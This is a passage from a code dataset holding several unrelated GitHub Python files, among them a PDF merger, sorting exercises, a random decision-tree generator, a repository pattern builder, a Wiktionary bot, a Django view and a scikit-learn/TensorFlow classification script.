r'C:\\Users\\saadbasheer\\Desktop\\Code\\Python\\Projects\\pdfmerger\\input'\r\noutputdir = r'C:\\Users\\saadbasheer\\Desktop\\Code\\Python\\Projects\\pdfmerger\\output'\r\n\r\ndef pdfmerger(input_dir, output_dir):\r\n merger = pdf.PdfMerger()\r\n filename = \"merged_pdf.pdf\"\r\n for files in os.listdir(input_dir):\r\n if files.endswith('.pdf'):\r\n merger.append(os.path.join(input_dir, files))\r\n\r\n merger.write(os.path.join(output_dir, filename))\r\n merger.close()\r\n\r\n\r\npdfmerger(inputdir, outputdir)\r\n","repo_name":"Saadbasheer/pdf-merger","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"71465020305","text":"# Selection sort\n\ndef selection(arr):\n for i in range(len(arr)):\n min_idx = i\n for j in range(i+1,len(arr)):\n if arr[min_idx] > arr[j]:\n min_idx = j\n arr[i],arr[min_idx]=arr[min_idx],arr[i]\n return arr\n\ns = [1,5,8,3,21,2,4]\nprint(selection(s))\n\n\nd=[1,1,2,3,4,3,5,2]\n# remove duplicates in place: pop by index, and only advance j when nothing was removed\ni = 0\nwhile i < len(d):\n j = i+1\n while j < len(d):\n if d[i]==d[j]:\n d.pop(j)\n else:\n j += 1\n i += 1\n\nprint(d)\nf=[]\nfor i in d:\n if i not in f:\n f.append(i)\nprint(f)\n\ng=[]\nfor i in range(len(d)):\n for j in range(i+1,len(d)):\n if d[i]==d[j] and d[i] not in g:\n g.append(d[i])\n \nprint(\"g is \",g)\n\nresult =0\nfor i in range(len(d)):\n result ^=d[i]\n\nprint(result)\n\nz = [1,2,1,4,5,7,4,5]\n\nclass Solution:\n def threeSum(self, nums):\n n = len(nums)\n nums.sort()\n l=set()\n for i in range(n-2):\n j = i+1\n k = n-1\n while(j0:\n left = generate_balanced_tree_rec(max_depth-1, bitlength, num_attributes, seed)\n right = generate_balanced_tree_rec(max_depth-1, bitlength, num_attributes, seed)\n threshold = random.randint(0, 2**bitlength-1)\n feature = random.randint(0, num_attributes-1)\n t = Internal(threshold, feature, left, right)\n else:\n t = Leaf(random.randint(0, 2**CLASSIFICATION_VALUE_BITLENGTH-1))\n\n return t \n\n\ndef generate_balanced_tree(max_depth, path, bitlength, num_attributes, seed=None):\n if seed is not None:\n random.seed(seed)\n with open(path, 'w') as output_file:\n stack=[0]\n while len(stack) > 0:\n current_depth = stack[0]\n if current_depth == max_depth:\n threshold = random.randint(0, 2**CLASSIFICATION_VALUE_BITLENGTH-1)\n attribute_index = -1\n output_file.write(f'{threshold} {attribute_index}\\n')\n \n stack = stack[1:]\n elif current_depth < max_depth:\n threshold = random.randint(0, 2**bitlength-1)\n attribute_index = random.randint(0, num_attributes-1)\n output_file.write(f'{threshold} {attribute_index}\\n')\n stack = [current_depth+1, current_depth+1] + stack[1:]\n else:\n print(\"This should not happen!\")\n\ndef generate_input(path, bitlength, num_attributes, seed=None):\n if seed is not None:\n random.seed(seed)\n with open(path, 'w') as output_file:\n for _ in range(num_attributes):\n attribute_value = random.randint(0, 2**bitlength-1)\n output_file.write(f'{attribute_value}\\n')\n \n\ndef generate_balanced_tree_from_args(args):\n max_depth = args.max_depth\n path = args.path\n bitlength=args.bitlength\n num_attributes = args.num_attributes\n generate_balanced_tree(max_depth=max_depth,path=path,bitlength=bitlength,num_attributes=num_attributes)\n\n\ndef catalan(n):\n return comb(2*n, n) / (n+1)\n\ndef recursive_uniform_tree_generator(remaining_inner_nodes):\n if remaining_inner_nodes == 0:\n return [True]\n\n remaining_inner_nodes -= 1\n weights = [ catalan(i)*catalan(remaining_inner_nodes-i) for i in range(0,remaining_inner_nodes+1) ]\n \n 
left_inner_nodes=random.choices(range(0,remaining_inner_nodes+1), weights=weights)[0]\n right_inner_nodes=remaining_inner_nodes-left_inner_nodes\n\n return [False] + recursive_uniform_tree_generator(left_inner_nodes) + recursive_uniform_tree_generator(right_inner_nodes)\n\ndef generate_random_unbalanced_tree(args):\n number_of_nodes=args.number_of_nodes\n preorder_representation=recursive_uniform_tree_generator(number_of_nodes)\n generate_and_write_tree(preorder_representation, args)\n\n# if __name__ == '__main__':\n\n# parser = argparse.ArgumentParser()\n\n# # common for both cases \n# parser.add_argument('--bitlength', type=int, default=32)\n# parser.add_argument('--num_attributes', type=int, default=4)\n# parser.add_argument('--balanced', const=True, default=False, nargs='?')\n\n# # balanced case\n# parser.add_argument('--max_depth', type=int, default=4)\n# parser.add_argument('--path', type=str, required=True)\n\n# # unbalanced case\n# parser.add_argument('--number_of_nodes', type=int, default=31)\n\n# args = parser.parse_args()\n\n# if args.balanced:\n# print(\"Balanced!\")\n# generate_balanced_tree_from_args(args)\n# else:\n# print(\"Not Balanced!\")\n# generate_random_unbalanced_tree(args)\n \n\nimport os \nimport json\n\nWORKSPACE_DIR='/home/r5akhava/private-decision-tree-evaluation/experiments'\n\nif __name__ == '__main__':\n write_path = 'datasets_synthetic'\n for max_depth in range(2,21):\n for bitlength in [8, 12, 16, 24, 32]:\n for num_attributes in range(2, 200, 10):\n t = generate_balanced_tree_rec(max_depth, bitlength, num_attributes)\n with open(os.path.join(WORKSPACE_DIR, write_path, f'tree_depth_{max_depth}_n_{bitlength}_attr_{num_attributes}.json'), 'w+') as f:\n f.write(json.dumps(t.__dict__))\n\n","repo_name":"RasoulAM/private-decision-tree-evaluation","sub_path":"experiments/generate_random_tree.py","file_name":"generate_random_tree.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"35325417345","text":"import yaml\nimport sys, os\nimport optparse\nfrom lxml import etree\n\nrpm_ns=\"http://linux.duke.edu/metadata/rpm\"\npattern_ns=\"http://novell.com/package/metadata/suse/pattern\"\nNSMAP = {None : pattern_ns, \"rpm\": rpm_ns}\n\nNSMAP_GROUP = {None : pattern_ns, \"rpm\": rpm_ns, \"patterns\": pattern_ns}\n\ndef process_yaml(stream, version, release, xmlroot, nsmap_name, newobsapi):\n\t\"Process all documents in the yaml stream and return a count of number handled\"\n\n\tall_docs = yaml.load_all(stream, Loader = yaml.SafeLoader)\n\t\n\tfor y in all_docs:\n\t\t# \n\t\tproot = etree.SubElement(xmlroot, \"pattern\", nsmap=nsmap_name)\n\t\t\n\t\t# \n\t\tetree.SubElement(proot, \"name\").text = y['Name']\n\n\t\t# Old OBS isn't able to handle these options.\n\t\tif newobsapi:\n\t\t\t# \n\t\t\tif 'Version' in y or version:\n\t\t\t\tentry = etree.SubElement(proot, \"version\")\n\t\t\t\tver = \"0\"\n\t\t\t\tif version:\n\t\t\t\t\tver = version\n\t\t\t\telse:\n\t\t\t\t\tver = y['Version']\n\n\t\t\t\t# Set to 0 by default as that is what OBS expects.\n\t\t\t\tepoch = \"0\"\n\t\t\t\tif 'Epoch' in y:\n\t\t\t\t\tepoch = y['Epoch']\n\n\t\t\t\t# As above...\n\t\t\t\trel = \"0\"\n\t\t\t\tif release:\n\t\t\t\t\trel = release\n\t\t\t\tif 'Release' in y:\n\t\t\t\t\trel = y['Release']\n\n\t\t\t\tentry.set('ver', \"%s\" % ver)\n\t\t\t\tentry.set('epoch', \"%s\" % epoch)\n\t\t\t\tentry.set('rel', \"%s\" % rel)\n\n\t\t\t# \n\t\t\tif 'Arch' in y:\n\t\t\t\tetree.SubElement(proot, 
\"arch\").text = \"%s\" % y['Arch']\n\n\t\t#

\n\t\tetree.SubElement(proot, \"summary\").text = y['Summary']\n\t\t# \n\t\tetree.SubElement(proot, \"description\").text = y['Description']\n\t\t# \n\t\tetree.SubElement(proot, \"uservisible\")\n\t\t# \n\t\tcat = etree.SubElement(proot, \"category\")\n\t\tcat.text = \"Base Group\"\n\t\tcat.set(\"lang\", \"en\")\n\n\t\tpackage_keys = ['Packages','Conflicts', 'Requires', 'Recommends', 'Suggests', 'Provides', 'Obsoletes']\n\t\tfor key in package_keys:\n\t\t\tif key not in y:\n\t\t\t\tcontinue\n\n\t\t\tcollect = y[key]\n\t\t\tif key == \"Packages\":\n\t\t\t\t# Support obsoleted keys, this should be removed in the future\n\t\t\t\tkey = \"Requires\"\n\t\t\t\tprint (\"WARNING: Oboleted key 'Packages' in .yaml please change to 'Requires'.\")\n\t\t\t\n\t\t\treq = etree.SubElement(proot, \"{%s}%s\" % (rpm_ns,key.lower()))\n\n\t\t\tfor p in collect:\n\t\t\t\tif type(p).__name__=='dict':\n\t\t\t\t\tprint (\"ERROR: Found dict and expected string value. '%s'\" % (p))\n\t\t\t\t\tsys.exit(1)\n\t\t\t\tentry = etree.SubElement(req, \"{%s}entry\" %rpm_ns)\n\n\t\t\t\tname = p\n\t\t\t\tver = None\n\t\t\t\top_in = [\">=\", \"<=\", \">\", \"<\", \"=\"]\n\t\t\t\top_out = [\"GE\", \"LE\", \"GT\", \"LT\", \"EQ\"]\n\t\t\t\topc = 0\n\t\t\t\tfor op in op_in:\n\t\t\t\t\tif op in p:\n\t\t\t\t\t\tname, ver = p.split(op)\n\t\t\t\t\t\tbreak\n\t\t\t\t\topc = opc + 1\n\n\t\t\t\tentry.set(\"name\", name.strip())\n\t\t\t\tif ver:\n\t\t\t\t\tentry.set(\"flags\", \"%s\" % (op_out[opc]))\n\t\t\t\t\tentry.set(\"ver\", \"%s\" % (ver.strip()))\n\ndef create_patterns(patterns_dir, version, release, outputdir, newobsapi):\n\tdirlist = os.listdir(patterns_dir)\n\tdirlist.sort()\n\tfor f in dirlist:\n\t\tif not f.endswith('.yaml'):\n\t\t\tcontinue\n\t\t\n\t\tstream = open(\"%s/%s\" %(patterns_dir,f), 'r')\n\t\txmlroot = etree.Element(\"temporary_root\", nsmap=NSMAP)\n\t\t\n\t\tprocess_yaml(stream, version, release, xmlroot, NSMAP, newobsapi)\n\n\t\tfor pattern in xmlroot.findall(\"pattern\"):\n\t\t\t\n\t\t\tname = pattern.find(\"name\")\n\t\t\tif name == None:\n\t\t\t\tprint (\"Pattern didn't have name skipping.\")\n\t\t\t\tcontinue\n\t\t\toutput_file = \"%s/%s.xml\" % (outputdir,name.text.lower())\n\t\t\tprint (\"Working on %s\" % (output_file))\n\n\t\t\tetree.ElementTree(pattern).write(output_file, pretty_print=True)\n\ndef merge_patterns(patterns_dir, version, release, outputdir, newobsapi):\n\txmlroot = etree.Element(\"patterns\")\n\toutput_file = \"%s/patterns.xml\" % (outputdir)\n\tdirlist = os.listdir(patterns_dir)\n\tdirlist.sort()\n\n\tfor f in dirlist:\n\t\tif not f.endswith('.yaml'):\n\t\t\tcontinue\n\t\tprint (\"Merging %s to %s.\" % (f,output_file))\n\t\tstream = file(\"%s/%s\" %(patterns_dir,f), 'r')\n\t\tprocess_yaml(stream, version, release, xmlroot, NSMAP_GROUP, newobsapi)\n\n\tpatterns = xmlroot.findall(\"pattern\")\n\txmlroot.set('count', \"%d\" % (len(patterns)))\n\n\tetree.ElementTree(xmlroot).write(output_file, pretty_print=True)\n\nif __name__ == '__main__':\n\tparser = optparse.OptionParser()\n\n\tparser.add_option(\"\", \"--patternxml\", action=\"store_true\", dest=\"patternxml\",\n\t\t\tdefault=False,\n\t\t\thelp=\"Create separated pattern XML file for each pattern.\")\n\tparser.add_option(\"\", \"--patternsxml\", action=\"store_true\", dest=\"patternsxml\",\n\t\t\tdefault=False,\n\t\t\thelp=\"Create merged patterns.xml from all the available patterns.\")\n\tparser.add_option(\"\", \"--groupxml\", action=\"store_true\", dest=\"groupxml\",\n\t\t\tdefault=False,\n\t\t\thelp=\"Create 
group.xml.\")\n\tparser.add_option(\"-p\", \"--patterndir\", type=\"string\", dest=\"patterndir\",\n\t\t\tdefault=None,\n\t\t\thelp=\"Directory where the pattern .yaml files are located.\")\n\tparser.add_option(\"-o\", \"--outputdir\", type=\"string\", dest=\"outputdir\",\n\t\t\tdefault=\".\",\n\t\t\thelp=\"Output directory where the resulting .xml files are created.\")\n\tparser.add_option(\"\", \"--old-obs-xml-format\", action=\"store_false\", dest=\"newobsapi\",\n\t\t\tdefault=True,\n\t\t\thelp=\"The old OBS api isn't able to handle the newer xml format.\")\n\tparser.add_option(\"--version\", type=\"string\", dest=\"version\", default=None, help=\"Version number\")\n\tparser.add_option(\"--release\", type=\"string\", dest=\"release\", default=None, help=\"Release number\")\n\t\n\t(options, args) = parser.parse_args()\n\t\n\tif (options.groupxml):\n\t\tprint (\"ERROR: Groupxml isn't supported atm.\")\n\t\texit(1)\n\n\tif (not options.patternsxml and not options.patternxml):\n\t\t# Default to patternxml.\n\t\toptions.patternxml = True\n\t\n\tif (not options.patterndir or not os.path.exists(options.patterndir)):\n\t\tprint (\"Error: Pattern dir '%s' doesn't exist.\" % (options.patterndir))\n\t\texit(1)\n\t\n\tif options.outputdir and not os.path.exists(options.outputdir):\n\t\tos.makedirs(options.outputdir)\n\t\n\tif options.patternxml:\n\t\tcreate_patterns(options.patterndir, options.version, options.release, options.outputdir, options.newobsapi)\n\n\tif options.patternsxml:\n\t\tmerge_patterns(options.patterndir, options.version, options.release, options.outputdir, options.newobsapi)\n\n","repo_name":"sailfishos/repomd-pattern-builder","sub_path":"repomd-pattern-builder.py","file_name":"repomd-pattern-builder.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26336782497","text":"'''\nReplace U+2019 RIGHT SINGLE QUOTATION MARK with U+02BC MODIFIER LETTER APOSTROPHE in Taos entries.\n'''\n\nimport argparse\nimport itertools\nimport re\n\nimport pywikibot\nimport pywikibot.pagegenerators\nimport wikitextparser\n\nquote_mark = '\\N{RIGHT SINGLE QUOTATION MARK}'\nmod_letter = '\\N{MODIFIER LETTER APOSTROPHE}'\nmove_summary = 'Replace curly quotes (U+2019) with modifier letter apostrophes (U+02BC) per [[Wiktionary:Requests for moves, mergers and splits#Entries in CAT:Taos lemmas with curly apostrophes|discussion]].'\ntext_summary = move_summary\ncategory_names = ['Taos lemmas', 'Taos non-lemma forms', 'Taos noun forms']\n\ndef main():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-l', '--limit', default=-1, type=int)\n\tparser.add_argument('-d', '--dry-run', action='store_true')\n\targs = parser.parse_args()\n\n\tsite = pywikibot.Site()\n\tpage_generators = [pywikibot.pagegenerators.CategorizedPageGenerator(pywikibot.Category(site, name)) for name in category_names]\n\twith open('taos_skipped.txt', 'w') as skipped_file:\n\t\tfor i, page in enumerate(itertools.chain.from_iterable(page_generators)):\n\t\t\tif 0 < args.limit <= i:\n\t\t\t\tprint(f'Limit reached.')\n\t\t\t\tbreak\n\n\t\t\tparsed_page = wikitextparser.parse(page.text)\n\t\t\tsections = parsed_page.get_sections(level=2)\n\t\t\tif len(sections) == 1 and sections[0].title.strip() == 'Taos':\n\t\t\t\t# Replace in page title\n\t\t\t\tif quote_mark in page.title():\n\t\t\t\t\tnew_title = page.title().replace(quote_mark, mod_letter)\n\t\t\t\t\tif args.dry_run:\n\t\t\t\t\t\tprint(f'Would move {page.title(as_link=True)} 
to [[{new_title}]].')\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(f'Moving {page.title(as_link=True)} to [[{new_title}]].')\n\t\t\t\t\t\tpage.move(new_title, reason=move_summary)\n\t\t\t\t\t\t# prepare to read through the new page\n\t\t\t\t\t\tpage = pywikibot.page.Page(site, new_title)\n\t\t\t\t\t\tparsed_page = wikitextparser.parse(page.text)\n\t\t\t\t\t\tsections = parsed_page.get_sections(level=2)\n\n\t\t\t\t# Replace in page text\n\t\t\t\tsection_lines = sections[0].contents.splitlines()\n\t\t\t\tsection_sub_count = 0\n\t\t\t\tprint(f'Reading {page.title(as_link=True)}...')\n\t\t\t\tfor j, line in enumerate(section_lines):\n\t\t\t\t\tsection_lines[j], line_sub_count = re.subn(f'(?<=\\\\w){quote_mark}(?=\\\\w)', mod_letter, line)\n\t\t\t\t\tif line_sub_count:\n\t\t\t\t\t\tprint(f'Before: ' + line.encode('unicode-escape').decode())\n\t\t\t\t\t\tprint(f' After: ' + section_lines[j].encode('unicode-escape').decode())\n\t\t\t\t\t\tsection_sub_count += line_sub_count\n\t\t\t\tif section_sub_count:\n\t\t\t\t\tsections[0].contents = '\\n'.join(section_lines)\n\t\t\t\t\tpage.text = str(parsed_page)\n\t\t\t\t\tif args.dry_run:\n\t\t\t\t\t\twith open(f'{i}-{page.title()}.wiki', 'w') as saveFile:\n\t\t\t\t\t\t\tsaveFile.write(page.text)\n\t\t\t\t\telse:\n\t\t\t\t\t\tpage.save(summary=text_summary, botflag=True, quiet=False)\n\t\t\telse:\n\t\t\t\tprint(page.title(), file=skipped_file)\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"excarnateSojourner/wiktionary-bot","sub_path":"taos_apostrophes.py","file_name":"taos_apostrophes.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"140677335","text":"from collections import namedtuple\n\nimport sympy as sp\n\nExprResult = namedtuple('ExprResult',\n 'symbols,expr,domains,state,kwargs')\n\n\nclass MetricResult(object):\n \"\"\"Serializable result storing metrics\"\"\"\n __slots__ = 'effect_symbols', 'effect_latex'\n\n def __init__(self,\n symbols,\n effect):\n if not isinstance(symbols, (list, tuple)):\n symbols = (symbols,)\n\n symbols = [s.name if hasattr(s, 'name') else s\n for s in symbols]\n self.effect_symbols = symbols\n self.effect_latex = (effect if isinstance(effect, str) else\n sp.latex(effect))\n\n def as_dict(self):\n return {\n 'effect_symbols': self.effect_symbols,\n 'effect_latex': self.effect_latex,\n }\n\n @classmethod\n def from_dict(cls, d):\n # restore the slots written by as_dict without re-running __init__\n obj = cls.__new__(cls)\n obj.effect_symbols = d['effect_symbols']\n obj.effect_latex = d['effect_latex']\n return obj\n","repo_name":"craymichael/PostHocExplainerEvaluation","sub_path":"posthoceval/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
{"seq_id":"13624630584","text":"import random\nfrom datetime import datetime\n\nfrom django.views.generic import TemplateView\n\nfrom registration import settings\nfrom users.models import RegistrationCode\n\n\nclass IndexView(TemplateView):\n template_name = 'base.html'\n\n\nclass BotUrlView(TemplateView):\n template_name = 'bot.html'\n\n def get_context_data(self, **kwargs):\n context = super(BotUrlView, self).get_context_data()\n context['bot_name'] = settings.TELEGRAM_BOT_NAME\n if self.request.GET.get('generate') == 'yes':\n code = random.randint(10_000, 100_000)\n context['reg_code'] = code\n user = self.request.user\n\n if RegistrationCode.objects.filter(user__exact=user):\n user.reg_code.code = code\n user.reg_code.created_at = datetime.now()\n user.reg_code.save()\n else:\n code = 
RegistrationCode(code=code)\n user.reg_code = code\n code.save()\n return context\n","repo_name":"sch0nik/registration","sub_path":"registration/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11784215976","text":"##################################################\r\n# This file contains classification algorithms.\r\n# Callable function is classification, which returns an array of accuracies corresponding to the classifiers array.\r\n##################################################\r\n\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.ensemble import GradientBoostingClassifier\r\nfrom sklearn import tree\r\nimport os\r\nimport sys\r\nimport warnings\r\nfrom sklearn import preprocessing\r\nfrom inoutmd import read\r\nimport numpy as np\r\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\r\nimport tensorflow as tf\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\ntf.logging.set_verbosity(tf.logging.ERROR)\r\n\r\n\r\n# Principal classification function, given a path where the DB is, an array of classifiers, and an amount of folds, it returns\r\n# an array of accuracies, with length = length(classifiers)\r\n\r\n\r\ndef classification(i, j, k, n, classifiers, folds):\r\n \"\"\"\r\n This function takes as input path indices and a list of classifier indices and returns a list of\r\n accuracies generated from the file represented by the indices and each one of the classifiers.\r\n\r\n :param i: DB index\r\n :param j: MDT index\r\n :param k: Instance index\r\n :param n: IM index\r\n :param classifiers: list of classifier indices (usually range(0, 15))\r\n :param folds: Number of folds. Fixed beforehand.\r\n :return: List of accuracies generated from the different combinations of the previous parameters\r\n \"\"\"\r\n res = None\r\n try:\r\n for c in classifiers: # Foreach classifier,\r\n if not res:\r\n res = classify(i, j, k, n, c, folds)\r\n else:\r\n res.append(classify(i, j, k, n, c, folds)[1]) # Classify\r\n res = np.array(res)\r\n np.savetxt(\"ClassificationsMD/{0}-{1}-{2}-{3}.data\".format(str(i), str(j), str(k), str(n)), res, fmt='%i')\r\n except:\r\n print(\"{0}-{1}-{2}-{3}.data\".format(str(i), str(j), str(k), str(n)))\r\n\r\n return res\r\n\r\n\r\ndef classify(i, j, k, n, c, folds):\r\n \"\"\"\r\n This function reads the file represented by i, j, k, and n indices and generates an accuracy using \"folds\" folds\r\n and the classifier indexed by c.\r\n :param i: DB index\r\n :param j: MDT index\r\n :param k: Instance index\r\n :param n: IM index\r\n :param c: classifier index\r\n :param folds: Number of folds. 
Fixed beforehand.\r\n :return: Accuracy generated from the use of classifier c on the data described in the file represented by the\r\n indices.\r\n \"\"\"\r\n\r\n # ##############Select classifier ################# #\r\n if c == 0:\r\n clf = LogisticRegression(penalty=\"l1\")\r\n elif c == 1:\r\n clf = LogisticRegression(penalty=\"l2\")\r\n elif c == 2:\r\n clf = LinearDiscriminantAnalysis(solver=\"lsqr\")\r\n elif c == 3:\r\n clf = QuadraticDiscriminantAnalysis(reg_param=0.01)\r\n elif c == 4:\r\n x = read(\"DataMD/{0}-{1}-{2}-{3}.data\".format(str(i), str(j), str(k), \"0\"), delimiter=\",\")\r\n size = x.shape[0]\r\n feature_columns = [tf.contrib.layers.real_valued_column(\"\", dimension=x.shape[1]-1)]\r\n clf = tf.contrib.learn.DNNClassifier(feature_columns=feature_columns, hidden_units=[int(size/3*2), int(size/3)], n_classes=len(set(x[:, -1]))+1)\r\n #elif c == 5:\r\n #clf = tf.contrib.learn.DNNClassifier(hidden_units=[10, 20, 10])\r\n elif c == 6-1:\r\n clf = SVC(kernel='linear', C=1.0, tol=0.001, probability=True)\r\n elif c == 7-1:\r\n clf = SVC(kernel='poly', C=1.0, tol=0.01, probability=False, degree=2, cache_size=20000)\r\n elif c == 8-1:\r\n clf = SVC(kernel='rbf', C=1.0, gamma=0.10000000000000001, coef0=0, shrinking=True, probability=True)#RBFN\r\n elif c == 9-1:\r\n clf = GaussianNB() \r\n elif c == 10-1:\r\n clf = GradientBoostingClassifier(n_estimators=100, max_depth=11, subsample=1.0)\r\n elif c == 11-1:\r\n clf = RandomForestClassifier(n_estimators=10)\r\n elif c == 12-1:\r\n clf = tree.DecisionTreeClassifier() # CART, similar to c4.5\r\n elif c == 13-1:\r\n clf = KNeighborsClassifier(n_neighbors=1)\r\n elif c == 14-1:\r\n clf = KNeighborsClassifier(n_neighbors=3)\r\n #######################################################################\r\n\r\n full_predictions = []\r\n full_y = []\r\n\r\n for fold in range(0, folds):\r\n # For each stratified fold, we have one file. We read it.\r\n path = \"DataMD/\" + str(i) + \"-\" + str(j) + \"-\" + str(k) + \"-\" + str(fold) + \"-\" + str(n) + \".data\"\r\n x = read(path)\r\n x = preprocessing.Imputer().fit_transform(x)\r\n x[np.isnan(x)] = 0 # note: x == np.nan is always False, so use np.isnan\r\n # Separate class (always in last position, watch impute.py)\r\n y = x[:, len(x[0, :])-1]\r\n x = np.delete(x, len(x[0, :])-1, 1)\r\n\r\n # If class is string, transform to numeric labels\r\n if isinstance(y[0], str):\r\n le = preprocessing.LabelEncoder()\r\n le.fit(y)\r\n y = le.transform(y)\r\n # Set where the limit between the train and testing is. 
Remember that we always write first the training\r\n # part and then the testing part.\r\n\r\n lim = int(x.shape[0] / folds * (folds - 1))\r\n x_train = x[:lim,:]\r\n x_test = x[lim:,:]\r\n y_train = y[:lim].astype(int)\r\n y_test = y[lim:].astype(int)\r\n\r\n def get_train_inputs():\r\n x = tf.constant(x_train)\r\n y = tf.constant(y_train)\r\n\r\n return x, y\r\n\r\n def get_test_inputs():\r\n x = tf.constant(x_test)\r\n y = tf.constant(y_test)\r\n\r\n return x, y\r\n\r\n def get_predict_input():\r\n x = tf.constant(x_test)\r\n\r\n return x\r\n\r\n if c == 4:\r\n model = clf.fit(input_fn=get_train_inputs, max_steps=20000) # Model creation\r\n predictions = model.predict(input_fn=get_predict_input)\r\n # acc = clf.evaluate(input_fn=get_test_inputs, steps=1)[\"accuracy\"]\r\n else:\r\n model = clf.fit(x_train, y_train) # Model creation\r\n predictions = model.predict(x_test)\r\n\r\n full_predictions += list(predictions)\r\n full_y += y_test.tolist()\r\n #print(full_predictions)\r\n # print(accuracy_score(full_y, full_predictions))\r\n return [full_y, full_predictions]\r\n\r\n\r\ndef nn(x_train, y_train, x_test, y_test):\r\n\r\n \"\"\"\r\n A Convolutional Network implementation example using TensorFlow library.\r\n This example is using the MNIST database of handwritten digits\r\n (http://yann.lecun.com/exdb/mnist/)\r\n\r\n Author: Aymeric Damien\r\n Project: https://github.com/aymericdamien/TensorFlow-Examples/\r\n \"\"\"\r\n\r\n # Parameters\r\n learning_rate = 0.001\r\n training_iters = 200000\r\n batch_size = 128\r\n\r\n # Network Parameters\r\n n_input = x_train.shape[1]\r\n n_classes = len(set(y_train)) # MNIST total classes (0-9 digits)\r\n dropout = 0.75 # Dropout, probability to keep units\r\n\r\n\r\n # tf Graph input\r\n x = tf.placeholder(tf.float32, [None, n_input])\r\n y = tf.placeholder(tf.float32, [None, n_classes])\r\n keep_prob = tf.placeholder(tf.float32) #dropout (keep probability)\r\n\r\n\r\n # Create some wrappers for simplicity\r\n def conv2d(x, W, b, strides=1):\r\n # Conv2D wrapper, with bias and relu activation\r\n x = tf.nn.conv2d(x, W, strides=[1, strides, strides, 1], padding='SAME')\r\n x = tf.nn.bias_add(x, b)\r\n return tf.nn.relu(x)\r\n\r\n\r\n def maxpool2d(x, k=2):\r\n # MaxPool2D wrapper\r\n return tf.nn.max_pool(x, ksize=[1, k, k, 1], strides=[1, k, k, 1],\r\n padding='SAME')\r\n\r\n\r\n # Create model\r\n def conv_net(x, weights, biases, dropout):\r\n\r\n\r\n # Convolution Layer\r\n conv1 = conv2d(x, weights['wc1'], biases['bc1'])\r\n # Max Pooling (down-sampling)\r\n conv1 = maxpool2d(conv1, k=2)\r\n\r\n # Convolution Layer\r\n conv2 = conv2d(conv1, weights['wc2'], biases['bc2'])\r\n # Max Pooling (down-sampling)\r\n conv2 = maxpool2d(conv2, k=2)\r\n\r\n # Fully connected layer\r\n # Reshape conv2 output to fit fully connected layer input\r\n fc1 = tf.reshape(conv2, [-1, weights['wd1'].get_shape().as_list()[0]])\r\n fc1 = tf.add(tf.matmul(fc1, weights['wd1']), biases['bd1'])\r\n fc1 = tf.nn.relu(fc1)\r\n # Apply Dropout\r\n fc1 = tf.nn.dropout(fc1, dropout)\r\n\r\n # Output, class prediction\r\n out = tf.add(tf.matmul(fc1, weights['out']), biases['out'])\r\n return out\r\n\r\n # Store layers weight & bias\r\n weights = {\r\n # 5x5 conv, 1 input, 32 outputs\r\n 'wc1': tf.Variable(tf.random_normal([5, 5, 1, 32])),\r\n # 5x5 conv, 32 inputs, 64 outputs\r\n 'wc2': tf.Variable(tf.random_normal([5, 5, 32, 64])),\r\n # fully connected, 7*7*64 inputs, 1024 outputs\r\n 'wd1': tf.Variable(tf.random_normal([7*7*64, 1024])),\r\n # 1024 inputs, n outputs (class 
prediction)\r\n        'out': tf.Variable(tf.random_normal([1024, n_classes]))\r\n    }\r\n\r\n    biases = {\r\n        'bc1': tf.Variable(tf.random_normal([32])),\r\n        'bc2': tf.Variable(tf.random_normal([64])),\r\n        'bd1': tf.Variable(tf.random_normal([1024])),\r\n        'out': tf.Variable(tf.random_normal([n_classes]))\r\n    }\r\n\r\n    # Construct model\r\n    pred = conv_net(x, weights, biases, keep_prob)\r\n\r\n    # Define loss and optimizer\r\n    cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))\r\n    optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\r\n\r\n    # Evaluate model\r\n    correct_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))\r\n    accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\r\n\r\n    # Initializing the variables\r\n    init = tf.global_variables_initializer()\r\n\r\n    # Launch the graph\r\n    with tf.Session() as sess:\r\n        sess.run(init)\r\n        step = 1\r\n        # Keep training until reach max iterations\r\n        while step * batch_size < training_iters:\r\n            batch_x = x_train[((step-1) * batch_size):(step * batch_size), :]\r\n            batch_y = y_train[((step-1) * batch_size):(step * batch_size)]\r\n            # Run optimization op (backprop)\r\n            sess.run(optimizer, feed_dict={x: batch_x, y: batch_y,\r\n                                           keep_prob: dropout})\r\n            step += 1\r\n        print(\"Optimization Finished!\")\r\n\r\n        # Calculate accuracy for 256 mnist test images\r\n        return \"Testing Accuracy:\", \\\r\n            sess.run(accuracy, feed_dict={x: x_test,\r\n                                          y: y_test,\r\n                                          keep_prob: 1.})\r\n\r\n\"\"\"\r\npath = \"Data/\" + str(0) + \"-\" + str(0) + \"-\" + str(0) + \"-\" + str(0) + \"-\" + str(0) + \".data\"\r\nx = 